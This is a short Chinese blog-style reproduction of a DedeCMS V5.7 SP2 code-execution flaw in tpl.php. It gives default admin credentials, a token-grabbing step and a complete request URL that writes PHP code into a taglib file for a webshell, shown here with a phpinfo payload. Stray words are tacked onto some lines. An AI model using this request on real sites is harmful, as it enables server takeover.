dedecms v5.7 sp2代码执行漏洞复现
环境搭建php
DeDeCMS官网:http://www.dedecms.com
网站源码版本:DedeCMS V5.7 SP2正式版
程序源码下载:http://www.dedecms.com/products/dedecms/downloads/
默认后台地址:http://127.0.0.1/dede
默认帐号密码:admin adminweb
演示shell
本地搭建织梦站点
域名后面加上个/dede访问后台,
默认账号密码admin登陆
http://localhost:8080/DedeCMS/uploads/dede/
DedeCMS V5.7 SP2版本中tpl.php存在代码执行,利用这个漏洞在增长新的标签中上传木马 获取Webshell
咱们先获取token,访问/dede/tpl.php?action=upload
在该页面中查看源代码获取到token值
访问
http://localhost:8080/DedeCMS/uploads/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=55ab8c3e67797476fac5a53259f700b6【URL地址+token值自行更换】
而后访问 /include/taglib/secquan.lib.php读取获得phpinfo
http://localhost:8080/DedeCMS/uploads/include/taglib/secquan.lib.php
来源 dedecms v5.7 sp2代码执行漏洞复现svg